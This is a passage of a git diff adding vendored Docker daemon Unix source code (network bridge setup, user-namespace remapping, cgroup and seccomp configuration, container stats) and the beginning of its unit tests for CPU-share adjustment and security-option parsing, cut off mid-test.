+	if daemon.configStore.RemappedRoot != "" && hostConfig.UsernsMode.IsPrivate() {
+		if hostConfig.Privileged {
+			return warnings, fmt.Errorf("Privileged mode is incompatible with user namespaces")
+		}
+		if hostConfig.NetworkMode.IsHost() && !hostConfig.UsernsMode.IsHost() {
+			return warnings, fmt.Errorf("Cannot share the host's network namespace when user namespaces are enabled")
+		}
+		if hostConfig.PidMode.IsHost() && !hostConfig.UsernsMode.IsHost() {
+			return warnings, fmt.Errorf("Cannot share the host PID namespace when user namespaces are enabled")
+		}
+	}
+	if hostConfig.CgroupParent != "" && UsingSystemd(daemon.configStore) {
+		// CgroupParent for systemd cgroup should be named as "xxx.slice"
+		if len(hostConfig.CgroupParent) <= 6 || !strings.HasSuffix(hostConfig.CgroupParent, ".slice") {
+			return warnings, fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"")
+		}
+	}
+	if hostConfig.Runtime == "" {
+		hostConfig.Runtime = daemon.configStore.GetDefaultRuntimeName()
+	}
+
+	if rt := daemon.configStore.GetRuntime(hostConfig.Runtime); rt == nil {
+		return warnings, fmt.Errorf("Unknown runtime specified %s", hostConfig.Runtime)
+	}
+
+	return warnings, nil
+}
+
+// platformReload update configuration with platform specific options
+func (daemon *Daemon) platformReload(config *Config) map[string]string {
+	if config.IsValueSet("runtimes") {
+		daemon.configStore.Runtimes = config.Runtimes
+		// Always set the default one
+		daemon.configStore.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary}
+	}
+
+	if config.DefaultRuntime != "" {
+		daemon.configStore.DefaultRuntime = config.DefaultRuntime
+	}
+
+	// Update attributes
+	var runtimeList bytes.Buffer
+	for name, rt := range daemon.configStore.Runtimes {
+		if runtimeList.Len() > 0 {
+			runtimeList.WriteRune(' ')
+		}
+		runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt))
+	}
+
+	return map[string]string{
+		"runtimes":        runtimeList.String(),
+		"default-runtime": daemon.configStore.DefaultRuntime,
+	}
+}
+
+// verifyDaemonSettings performs validation of daemon config struct
+func verifyDaemonSettings(config *Config) error {
+	// Check for mutually incompatible config options
+	if config.bridgeConfig.Iface != "" && config.bridgeConfig.IP != "" {
+		return fmt.Errorf("You specified -b & --bip, mutually exclusive options. Please specify only one")
+	}
+	if !config.bridgeConfig.EnableIPTables && !config.bridgeConfig.InterContainerCommunication {
+		return fmt.Errorf("You specified --iptables=false with --icc=false. ICC=false uses iptables to function. Please set --icc or --iptables to true")
+	}
+	if !config.bridgeConfig.EnableIPTables && config.bridgeConfig.EnableIPMasq {
+		config.bridgeConfig.EnableIPMasq = false
+	}
+	if err := VerifyCgroupDriver(config); err != nil {
+		return err
+	}
+	if config.CgroupParent != "" && UsingSystemd(config) {
+		if len(config.CgroupParent) <= 6 || !strings.HasSuffix(config.CgroupParent, ".slice") {
+			return fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"")
+		}
+	}
+
+	if config.DefaultRuntime == "" {
+		config.DefaultRuntime = stockRuntimeName
+	}
+	if config.Runtimes == nil {
+		config.Runtimes = make(map[string]types.Runtime)
+	}
+	config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary}
+
+	return nil
+}
+
+// checkSystem validates platform-specific requirements
+func checkSystem() error {
+	if os.Geteuid() != 0 {
+		return fmt.Errorf("The Docker daemon needs to be run as root")
+	}
+	return checkKernel()
+}
+
+// configureMaxThreads sets the Go runtime max threads threshold
+// which is 90% of the kernel setting from /proc/sys/kernel/threads-max
+func configureMaxThreads(config *Config) error {
+	mt, err := ioutil.ReadFile("/proc/sys/kernel/threads-max")
+	if err != nil {
+		return err
+	}
+	mtint, err := strconv.Atoi(strings.TrimSpace(string(mt)))
+	if err != nil {
+		return err
+	}
+	maxThreads := (mtint / 100) * 90
+	debug.SetMaxThreads(maxThreads)
+	logrus.Debugf("Golang's threads limit set to %d", maxThreads)
+	return nil
+}
+
+// configureKernelSecuritySupport configures and validates security support for the kernel
+func configureKernelSecuritySupport(config *Config, driverName string) error {
+	if config.EnableSelinuxSupport {
+		if !selinuxEnabled() {
+			logrus.Warn("Docker could not enable SELinux on the host system")
+		}
+	} else {
+		selinuxSetDisabled()
+	}
+	return nil
+}
+
+func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
+	netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes)
+	if err != nil {
+		return nil, err
+	}
+
+	controller, err := libnetwork.New(netOptions...)
+	if err != nil {
+		return nil, fmt.Errorf("error obtaining controller instance: %v", err)
+	}
+
+	if len(activeSandboxes) > 0 {
+		logrus.Info("There are old running containers, the network config will not take affect")
+		return controller, nil
+	}
+
+	// Initialize default network on "null"
+	if n, _ := controller.NetworkByName("none"); n == nil {
+		if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(true)); err != nil {
+			return nil, fmt.Errorf("Error creating default \"null\" network: %v", err)
+		}
+	}
+
+	// Initialize default network on "host"
+	if n, _ := controller.NetworkByName("host"); n == nil {
+		if _, err := controller.NewNetwork("host", "host", "", libnetwork.NetworkOptionPersist(true)); err != nil {
+			return nil, fmt.Errorf("Error creating default \"host\" network: %v", err)
+		}
+	}
+
+	// Clear stale bridge network
+	if n, err := controller.NetworkByName("bridge"); err == nil {
+		if err = n.Delete(); err != nil {
+			return nil, fmt.Errorf("could not delete the default bridge network: %v", err)
+		}
+	}
+
+	if !config.DisableBridge {
+		// Initialize default driver "bridge"
+		if err := initBridgeDriver(controller, config); err != nil {
+			return nil, err
+		}
+	} else {
+		removeDefaultBridgeInterface()
+	}
+
+	return controller, nil
+}
+
+func driverOptions(config *Config) []nwconfig.Option {
+	bridgeConfig := options.Generic{
+		"EnableIPForwarding":  config.bridgeConfig.EnableIPForward,
+		"EnableIPTables":      config.bridgeConfig.EnableIPTables,
+		"EnableUserlandProxy": config.bridgeConfig.EnableUserlandProxy,
+		"UserlandProxyPath":   config.bridgeConfig.UserlandProxyPath}
+	bridgeOption := options.Generic{netlabel.GenericData: bridgeConfig}
+
+	dOptions := []nwconfig.Option{}
+	dOptions = append(dOptions, nwconfig.OptionDriverConfig("bridge", bridgeOption))
+	return dOptions
+}
+
+func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error {
+	bridgeName := bridge.DefaultBridgeName
+	if config.bridgeConfig.Iface != "" {
+		bridgeName = config.bridgeConfig.Iface
+	}
+	netOption := map[string]string{
+		bridge.BridgeName:         bridgeName,
+		bridge.DefaultBridge:      strconv.FormatBool(true),
+		netlabel.DriverMTU:        strconv.Itoa(config.Mtu),
+		bridge.EnableIPMasquerade: strconv.FormatBool(config.bridgeConfig.EnableIPMasq),
+		bridge.EnableICC:          strconv.FormatBool(config.bridgeConfig.InterContainerCommunication),
+	}
+
+	// --ip processing
+	if config.bridgeConfig.DefaultIP != nil {
+		netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String()
+	}
+
+	var (
+		ipamV4Conf *libnetwork.IpamConf
+		ipamV6Conf *libnetwork.IpamConf
+	)
+
+	ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)}
+
+	nwList, nw6List, err := netutils.ElectInterfaceAddresses(bridgeName)
+	if err != nil {
+		return errors.Wrap(err, "list bridge addresses failed")
+	}
+
+	nw := nwList[0]
+	if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" {
+		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
+		if err != nil {
+			return errors.Wrap(err, "parse CIDR failed")
+		}
+		// Iterate through in case there are multiple addresses for the bridge
+		for _, entry := range nwList {
+			if fCIDR.Contains(entry.IP) {
+				nw = entry
+				break
+			}
+		}
+	}
+
+	ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String()
+	hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask)
+	if hip.IsGlobalUnicast() {
+		ipamV4Conf.Gateway = nw.IP.String()
+	}
+
+	if config.bridgeConfig.IP != "" {
+		ipamV4Conf.PreferredPool = config.bridgeConfig.IP
+		ip, _, err := net.ParseCIDR(config.bridgeConfig.IP)
+		if err != nil {
+			return err
+		}
+		ipamV4Conf.Gateway = ip.String()
+	} else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" {
+		logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool)
+	}
+
+	if config.bridgeConfig.FixedCIDR != "" {
+		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
+		if err != nil {
+			return err
+		}
+
+		ipamV4Conf.SubPool = fCIDR.String()
+	}
+
+	if config.bridgeConfig.DefaultGatewayIPv4 != nil {
+		ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String()
+	}
+
+	var deferIPv6Alloc bool
+	if config.bridgeConfig.FixedCIDRv6 != "" {
+		_, fCIDRv6, err := net.ParseCIDR(config.bridgeConfig.FixedCIDRv6)
+		if err != nil {
+			return err
+		}
+
+		// In case user has specified the daemon flag --fixed-cidr-v6 and the passed network has
+		// at least 48 host bits, we need to guarantee the current behavior where the containers'
+		// IPv6 addresses will be constructed based on the containers' interface MAC address.
+		// We do so by telling libnetwork to defer the IPv6 address allocation for the endpoints
+		// on this network until after the driver has created the endpoint and returned the
+		// constructed address. Libnetwork will then reserve this address with the ipam driver.
+		ones, _ := fCIDRv6.Mask.Size()
+		deferIPv6Alloc = ones <= 80
+
+		if ipamV6Conf == nil {
+			ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)}
+		}
+		ipamV6Conf.PreferredPool = fCIDRv6.String()
+
+		// In case the --fixed-cidr-v6 is specified and the current docker0 bridge IPv6
+		// address belongs to the same network, we need to inform libnetwork about it, so
+		// that it can be reserved with IPAM and it will not be given away to somebody else
+		for _, nw6 := range nw6List {
+			if fCIDRv6.Contains(nw6.IP) {
+				ipamV6Conf.Gateway = nw6.IP.String()
+				break
+			}
+		}
+	}
+
+	if config.bridgeConfig.DefaultGatewayIPv6 != nil {
+		if ipamV6Conf == nil {
+			ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)}
+		}
+		ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.bridgeConfig.DefaultGatewayIPv6.String()
+	}
+
+	v4Conf := []*libnetwork.IpamConf{ipamV4Conf}
+	v6Conf := []*libnetwork.IpamConf{}
+	if ipamV6Conf != nil {
+		v6Conf = append(v6Conf, ipamV6Conf)
+	}
+	// Initialize default network on "bridge" with the same name
+	_, err = controller.NewNetwork("bridge", "bridge", "",
+		libnetwork.NetworkOptionEnableIPv6(config.bridgeConfig.EnableIPv6),
+		libnetwork.NetworkOptionDriverOpts(netOption),
+		libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil),
+		libnetwork.NetworkOptionDeferIPv6Alloc(deferIPv6Alloc))
+	if err != nil {
+		return fmt.Errorf("Error creating default \"bridge\" network: %v", err)
+	}
+	return nil
+}
+
+// Remove default bridge interface if present (--bridge=none use case)
+func removeDefaultBridgeInterface() {
+	if lnk, err := netlink.LinkByName(bridge.DefaultBridgeName); err == nil {
+		if err := netlink.LinkDel(lnk); err != nil {
+			logrus.Warnf("Failed to remove bridge interface (%s): %v", bridge.DefaultBridgeName, err)
+		}
+	}
+}
+
+func (daemon *Daemon) getLayerInit() func(string) error {
+	return daemon.setupInitLayer
+}
+
+// Parse the remapped root (user namespace) option, which can be one of:
+//   username            - valid username from /etc/passwd
+//   username:groupname  - valid username; valid groupname from /etc/group
+//   uid                 - 32-bit unsigned int valid Linux UID value
+//   uid:gid             - uid value; 32-bit unsigned int Linux GID value
+//
+//  If no groupname is specified, and a username is specified, an attempt
+//  will be made to lookup a gid for that username as a groupname
+//
+//  If names are used, they are verified to exist in passwd/group
+func parseRemappedRoot(usergrp string) (string, string, error) {
+
+	var (
+		userID, groupID     int
+		username, groupname string
+	)
+
+	idparts := strings.Split(usergrp, ":")
+	if len(idparts) > 2 {
+		return "", "", fmt.Errorf("Invalid user/group specification in --userns-remap: %q", usergrp)
+	}
+
+	if uid, err := strconv.ParseInt(idparts[0], 10, 32); err == nil {
+		// must be a uid; take it as valid
+		userID = int(uid)
+		luser, err := idtools.LookupUID(userID)
+		if err != nil {
+			return "", "", fmt.Errorf("Uid %d has no entry in /etc/passwd: %v", userID, err)
+		}
+		username = luser.Name
+		if len(idparts) == 1 {
+			// if the uid was numeric and no gid was specified, take the uid as the gid
+			groupID = userID
+			lgrp, err := idtools.LookupGID(groupID)
+			if err != nil {
+				return "", "", fmt.Errorf("Gid %d has no entry in /etc/group: %v", groupID, err)
+			}
+			groupname = lgrp.Name
+		}
+	} else {
+		lookupName := idparts[0]
+		// special case: if the user specified "default", they want Docker to create or
+		// use (after creation) the "dockremap" user/group for root remapping
+		if lookupName == defaultIDSpecifier {
+			lookupName = defaultRemappedID
+		}
+		luser, err := idtools.LookupUser(lookupName)
+		if err != nil && idparts[0] != defaultIDSpecifier {
+			// error if the name requested isn't the special "dockremap" ID
+			return "", "", fmt.Errorf("Error during uid lookup for %q: %v", lookupName, err)
+		} else if err != nil {
+			// special case-- if the username == "default", then we have been asked
+			// to create a new entry pair in /etc/{passwd,group} for which the /etc/sub{uid,gid}
+			// ranges will be used for the user and group mappings in user namespaced containers
+			_, _, err := idtools.AddNamespaceRangesUser(defaultRemappedID)
+			if err == nil {
+				return defaultRemappedID, defaultRemappedID, nil
+			}
+			return "", "", fmt.Errorf("Error during %q user creation: %v", defaultRemappedID, err)
+		}
+		username = luser.Name
+		if len(idparts) == 1 {
+			// we only have a string username, and no group specified; look up gid from username as group
+			group, err := idtools.LookupGroup(lookupName)
+			if err != nil {
+				return "", "", fmt.Errorf("Error during gid lookup for %q: %v", lookupName, err)
+			}
+			groupID = group.Gid
+			groupname = group.Name
+		}
+	}
+
+	if len(idparts) == 2 {
+		// groupname or gid is separately specified and must be resolved
+		// to an unsigned 32-bit gid
+		if gid, err := strconv.ParseInt(idparts[1], 10, 32); err == nil {
+			// must be a gid, take it as valid
+			groupID = int(gid)
+			lgrp, err := idtools.LookupGID(groupID)
+			if err != nil {
+				return "", "", fmt.Errorf("Gid %d has no entry in /etc/passwd: %v", groupID, err)
+			}
+			groupname = lgrp.Name
+		} else {
+			// not a number; attempt a lookup
+			if _, err := idtools.LookupGroup(idparts[1]); err != nil {
+				return "", "", fmt.Errorf("Error during groupname lookup for %q: %v", idparts[1], err)
+			}
+			groupname = idparts[1]
+		}
+	}
+	return username, groupname, nil
+}
+
+func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) {
+	if runtime.GOOS != "linux" && config.RemappedRoot != "" {
+		return nil, nil, fmt.Errorf("User namespaces are only supported on Linux")
+	}
+
+	// if the daemon was started with remapped root option, parse
+	// the config option to the int uid,gid values
+	var (
+		uidMaps, gidMaps []idtools.IDMap
+	)
+	if config.RemappedRoot != "" {
+		username, groupname, err := parseRemappedRoot(config.RemappedRoot)
+		if err != nil {
+			return nil, nil, err
+		}
+		if username == "root" {
+			// Cannot setup user namespaces with a 1-to-1 mapping; "--root=0:0" is a no-op
+			// effectively
+			logrus.Warn("User namespaces: root cannot be remapped with itself; user namespaces are OFF")
+			return uidMaps, gidMaps, nil
+		}
+		logrus.Infof("User namespaces: ID ranges will be mapped to subuid/subgid ranges of: %s:%s", username, groupname)
+		// update remapped root setting now that we have resolved them to actual names
+		config.RemappedRoot = fmt.Sprintf("%s:%s", username, groupname)
+
+		uidMaps, gidMaps, err = idtools.CreateIDMappings(username, groupname)
+		if err != nil {
+			return nil, nil, fmt.Errorf("Can't create ID mappings: %v", err)
+		}
+	}
+	return uidMaps, gidMaps, nil
+}
+
+func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error {
+	config.Root = rootDir
+	// the docker root metadata directory needs to have execute permissions for all users (g+x,o+x)
+	// so that syscalls executing as non-root, operating on subdirectories of the graph root
+	// (e.g. mounted layers of a container) can traverse this path.
+	// The user namespace support will create subdirectories for the remapped root host uid:gid
+	// pair owned by that same uid:gid pair for proper write access to those needed metadata and
+	// layer content subtrees.
+	if _, err := os.Stat(rootDir); err == nil {
+		// root current exists; verify the access bits are correct by setting them
+		if err = os.Chmod(rootDir, 0711); err != nil {
+			return err
+		}
+	} else if os.IsNotExist(err) {
+		// no root exists yet, create it 0711 with root:root ownership
+		if err := os.MkdirAll(rootDir, 0711); err != nil {
+			return err
+		}
+	}
+
+	// if user namespaces are enabled we will create a subtree underneath the specified root
+	// with any/all specified remapped root uid/gid options on the daemon creating
+	// a new subdirectory with ownership set to the remapped uid/gid (so as to allow
+	// `chdir()` to work for containers namespaced to that uid/gid)
+	if config.RemappedRoot != "" {
+		config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootUID, rootGID))
+		logrus.Debugf("Creating user namespaced daemon root: %s", config.Root)
+		// Create the root directory if it doesn't exist
+		if err := idtools.MkdirAllAs(config.Root, 0700, rootUID, rootGID); err != nil {
+			return fmt.Errorf("Cannot create daemon root: %s: %v", config.Root, err)
+		}
+		// we also need to verify that any pre-existing directories in the path to
+		// the graphroot won't block access to remapped root--if any pre-existing directory
+		// has strict permissions that don't allow "x", container start will fail, so
+		// better to warn and fail now
+		dirPath := config.Root
+		for {
+			dirPath = filepath.Dir(dirPath)
+			if dirPath == "/" {
+				break
+			}
+			if !idtools.CanAccess(dirPath, rootUID, rootGID) {
+				return fmt.Errorf("A subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories.", config.Root)
+			}
+		}
+	}
+	return nil
+}
+
+// registerLinks writes the links to a file.
+func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error {
+	if hostConfig == nil || hostConfig.NetworkMode.IsUserDefined() {
+		return nil
+	}
+
+	for _, l := range hostConfig.Links {
+		name, alias, err := runconfigopts.ParseLink(l)
+		if err != nil {
+			return err
+		}
+		child, err := daemon.GetContainer(name)
+		if err != nil {
+			return fmt.Errorf("Could not get container for %s", name)
+		}
+		for child.HostConfig.NetworkMode.IsContainer() {
+			parts := strings.SplitN(string(child.HostConfig.NetworkMode), ":", 2)
+			child, err = daemon.GetContainer(parts[1])
+			if err != nil {
+				return fmt.Errorf("Could not get container for %s", parts[1])
+			}
+		}
+		if child.HostConfig.NetworkMode.IsHost() {
+			return runconfig.ErrConflictHostNetworkAndLinks
+		}
+		if err := daemon.registerLink(container, child, alias); err != nil {
+			return err
+		}
+	}
+
+	// After we load all the links into the daemon
+	// set them to nil on the hostconfig
+	return container.WriteHostConfig()
+}
+
+// conditionalMountOnStart is a platform specific helper function during the
+// container start to call mount.
+func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error {
+	return daemon.Mount(container)
+}
+
+// conditionalUnmountOnCleanup is a platform specific helper function called
+// during the cleanup of a container to unmount.
+func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error {
+	return daemon.Unmount(container)
+}
+
+func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) {
+	if !c.IsRunning() {
+		return nil, errNotRunning{c.ID}
+	}
+	stats, err := daemon.containerd.Stats(c.ID)
+	if err != nil {
+		return nil, err
+	}
+	s := &types.StatsJSON{}
+	cgs := stats.CgroupStats
+	if cgs != nil {
+		s.BlkioStats = types.BlkioStats{
+			IoServiceBytesRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceBytesRecursive),
+			IoServicedRecursive:     copyBlkioEntry(cgs.BlkioStats.IoServicedRecursive),
+			IoQueuedRecursive:       copyBlkioEntry(cgs.BlkioStats.IoQueuedRecursive),
+			IoServiceTimeRecursive:  copyBlkioEntry(cgs.BlkioStats.IoServiceTimeRecursive),
+			IoWaitTimeRecursive:     copyBlkioEntry(cgs.BlkioStats.IoWaitTimeRecursive),
+			IoMergedRecursive:       copyBlkioEntry(cgs.BlkioStats.IoMergedRecursive),
+			IoTimeRecursive:         copyBlkioEntry(cgs.BlkioStats.IoTimeRecursive),
+			SectorsRecursive:        copyBlkioEntry(cgs.BlkioStats.SectorsRecursive),
+		}
+		cpu := cgs.CpuStats
+		s.CPUStats = types.CPUStats{
+			CPUUsage: types.CPUUsage{
+				TotalUsage:        cpu.CpuUsage.TotalUsage,
+				PercpuUsage:       cpu.CpuUsage.PercpuUsage,
+				UsageInKernelmode: cpu.CpuUsage.UsageInKernelmode,
+				UsageInUsermode:   cpu.CpuUsage.UsageInUsermode,
+			},
+			ThrottlingData: types.ThrottlingData{
+				Periods:          cpu.ThrottlingData.Periods,
+				ThrottledPeriods: cpu.ThrottlingData.ThrottledPeriods,
+				ThrottledTime:    cpu.ThrottlingData.ThrottledTime,
+			},
+		}
+		mem := cgs.MemoryStats.Usage
+		s.MemoryStats = types.MemoryStats{
+			Usage:    mem.Usage,
+			MaxUsage: mem.MaxUsage,
+			Stats:    cgs.MemoryStats.Stats,
+			Failcnt:  mem.Failcnt,
+			Limit:    mem.Limit,
+		}
+		// if the container does not set memory limit, use the machineMemory
+		if mem.Limit > daemon.statsCollector.machineMemory && daemon.statsCollector.machineMemory > 0 {
+			s.MemoryStats.Limit = daemon.statsCollector.machineMemory
+		}
+		if cgs.PidsStats != nil {
+			s.PidsStats = types.PidsStats{
+				Current: cgs.PidsStats.Current,
+			}
+		}
+	}
+	s.Read, err = ptypes.Timestamp(stats.Timestamp)
+	if err != nil {
+		return nil, err
+	}
+	return s, nil
+}
+
+// setDefaultIsolation determines the default isolation mode for the
+// daemon to run in. This is only applicable on Windows
+func (daemon *Daemon) setDefaultIsolation() error {
+	return nil
+}
+
+func rootFSToAPIType(rootfs *image.RootFS) types.RootFS {
+	var layers []string
+	for _, l := range rootfs.DiffIDs {
+		layers = append(layers, l.String())
+	}
+	return types.RootFS{
+		Type:   rootfs.Type,
+		Layers: layers,
+	}
+}
+
+// setupDaemonProcess sets various settings for the daemon's process
+func setupDaemonProcess(config *Config) error {
+	// setup the daemons oom_score_adj
+	return setupOOMScoreAdj(config.OOMScoreAdjust)
+}
+
+func setupOOMScoreAdj(score int) error {
+	f, err := os.OpenFile("/proc/self/oom_score_adj", os.O_WRONLY, 0)
+	if err != nil {
+		return err
+	}
+
+	stringScore := strconv.Itoa(score)
+	_, err = f.WriteString(stringScore)
+	if os.IsPermission(err) {
+		// Setting oom_score_adj does not work in an
+		// unprivileged container. Ignore the error, but log
+		// it if we appear not to be in that situation.
+		if !rsystem.RunningInUserNS() {
+			logrus.Debugf("Permission denied writing %q to /proc/self/oom_score_adj", stringScore)
+		}
+		return nil
+	}
+	f.Close()
+	return err
+}
+
+func (daemon *Daemon) initCgroupsPath(path string) error {
+	if path == "/" || path == "." {
+		return nil
+	}
+
+	if daemon.configStore.CPURealtimePeriod == 0 && daemon.configStore.CPURealtimeRuntime == 0 {
+		return nil
+	}
+
+	// Recursively create cgroup to ensure that the system and all parent cgroups have values set
+	// for the period and runtime as this limits what the children can be set to.
+	daemon.initCgroupsPath(filepath.Dir(path))
+
+	_, root, err := cgroups.FindCgroupMountpointAndRoot("cpu")
+	if err != nil {
+		return err
+	}
+
+	path = filepath.Join(root, path)
+	sysinfo := sysinfo.New(true)
+	if sysinfo.CPURealtimePeriod && daemon.configStore.CPURealtimePeriod != 0 {
+		if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) {
+			return err
+		}
+		if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_period_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimePeriod, 10)), 0700); err != nil {
+			return err
+		}
+	}
+	if sysinfo.CPURealtimeRuntime && daemon.configStore.CPURealtimeRuntime != 0 {
+		if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) {
+			return err
+		}
+		if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_runtime_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimeRuntime, 10)), 0700); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (daemon *Daemon) setupSeccompProfile() error {
+	if daemon.configStore.SeccompProfile != "" {
+		daemon.seccompProfilePath = daemon.configStore.SeccompProfile
+		b, err := ioutil.ReadFile(daemon.configStore.SeccompProfile)
+		if err != nil {
+			return fmt.Errorf("opening seccomp profile (%s) failed: %v", daemon.configStore.SeccompProfile, err)
+		}
+		daemon.seccompProfile = b
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go
new file mode 100644
index 0000000000..6250d359e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go
@@ -0,0 +1,283 @@
+// +build !windows,!solaris
+
+package daemon
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/volume"
+	"github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/local"
+	"github.com/docker/docker/volume/store"
+)
+
+// Unix test as uses settings which are not available on Windows
+func TestAdjustCPUShares(t *testing.T) {
+	tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+	daemon := &Daemon{
+		repository: tmp,
+		root:       tmp,
+	}
+
+	hostConfig := &containertypes.HostConfig{
+		Resources: containertypes.Resources{CPUShares: linuxMinCPUShares - 1},
+	}
+	daemon.adaptContainerSettings(hostConfig, true)
+	if hostConfig.CPUShares != linuxMinCPUShares {
+		t.Errorf("Expected CPUShares to be %d", linuxMinCPUShares)
+	}
+
+	hostConfig.CPUShares = linuxMaxCPUShares + 1
+	daemon.adaptContainerSettings(hostConfig, true)
+	if hostConfig.CPUShares != linuxMaxCPUShares {
+		t.Errorf("Expected CPUShares to be %d", linuxMaxCPUShares)
+	}
+
+	hostConfig.CPUShares = 0
+	daemon.adaptContainerSettings(hostConfig, true)
+	if hostConfig.CPUShares != 0 {
+		t.Error("Expected CPUShares to be unchanged")
+	}
+
+	hostConfig.CPUShares = 1024
+	daemon.adaptContainerSettings(hostConfig, true)
+	if hostConfig.CPUShares != 1024 {
+		t.Error("Expected CPUShares to be unchanged")
+	}
+}
+
+// Unix test as uses settings which are not available on Windows
+func TestAdjustCPUSharesNoAdjustment(t *testing.T) {
+	tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+	daemon := &Daemon{
+		repository: tmp,
+		root:       tmp,
+	}
+
+	hostConfig := &containertypes.HostConfig{
+		Resources: containertypes.Resources{CPUShares: linuxMinCPUShares - 1},
+	}
+	daemon.adaptContainerSettings(hostConfig, false)
+	if hostConfig.CPUShares != linuxMinCPUShares-1 {
+		t.Errorf("Expected CPUShares to be %d", linuxMinCPUShares-1)
+	}
+
+	hostConfig.CPUShares = linuxMaxCPUShares + 1
+	daemon.adaptContainerSettings(hostConfig, false)
+	if hostConfig.CPUShares != linuxMaxCPUShares+1 {
+		t.Errorf("Expected CPUShares to be %d", linuxMaxCPUShares+1)
+	}
+
+	hostConfig.CPUShares = 0
+	daemon.adaptContainerSettings(hostConfig, false)
+	if hostConfig.CPUShares != 0 {
+		t.Error("Expected CPUShares to be unchanged")
+	}
+
+	hostConfig.CPUShares = 1024
+	daemon.adaptContainerSettings(hostConfig, false)
+	if hostConfig.CPUShares != 1024 {
+		t.Error("Expected CPUShares to be unchanged")
+	}
+}
+
+// Unix test as uses settings which are not available on Windows
+func TestParseSecurityOptWithDeprecatedColon(t *testing.T) {
+	container := &container.Container{}
+	config := &containertypes.HostConfig{}
+
+	// test apparmor
+	config.SecurityOpt = []string{"apparmor=test_profile"}
+	if err := parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected parseSecurityOpt error: %v", err)
+	}
+	if container.AppArmorProfile != "test_profile" {
+		t.Fatalf("Unexpected AppArmorProfile, expected: \"test_profile\", got %q", container.AppArmorProfile)
+	}
+
+	// test seccomp
+	sp := "/path/to/seccomp_test.json"
+	config.SecurityOpt = []string{"seccomp=" + sp}
+	if err := parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected parseSecurityOpt error: %v", err)
+	}
+	if container.SeccompProfile != sp {
+		t.Fatalf("Unexpected AppArmorProfile, expected: %q, got %q", sp, container.SeccompProfile)
+	}
+
+	// test valid label
+	config.SecurityOpt = []string{"label=user:USER"}
+	if err := parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected parseSecurityOpt error: %v", err)
+	}
+
+	// test invalid label
+	config.SecurityOpt = []string{"label"}
+	if err := parseSecurityOpt(container, config); err == nil {
+		t.Fatal("Expected parseSecurityOpt error, got nil")
+	}
+
+	// test invalid opt
+	config.SecurityOpt = []string{"test"}
+	if err := parseSecurityOpt(container, config); err == nil {
+		t.Fatal("Expected parseSecurityOpt error, got nil")
+	}
+}
+
+func TestParseSecurityOpt(t *testing.T) {
+	container := &container.Container{}
+	config := &containertypes.HostConfig{}
+
+	// test apparmor
+	config.SecurityOpt = []string{"apparmor=test_profile"}
+	if err := parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected parseSecurityOpt error: %v", err)
+	}
+	if container.AppArmorProfile != "test_profile" {
+		t.Fatalf("Unexpected AppArmorProfile, expected: \"test_profile\", got %q", container.AppArmorProfile)
+	}
+
+	// test seccomp
+	sp := "/path/to/seccomp_test.json"
+	config.SecurityOpt = []string{"seccomp=" + sp}
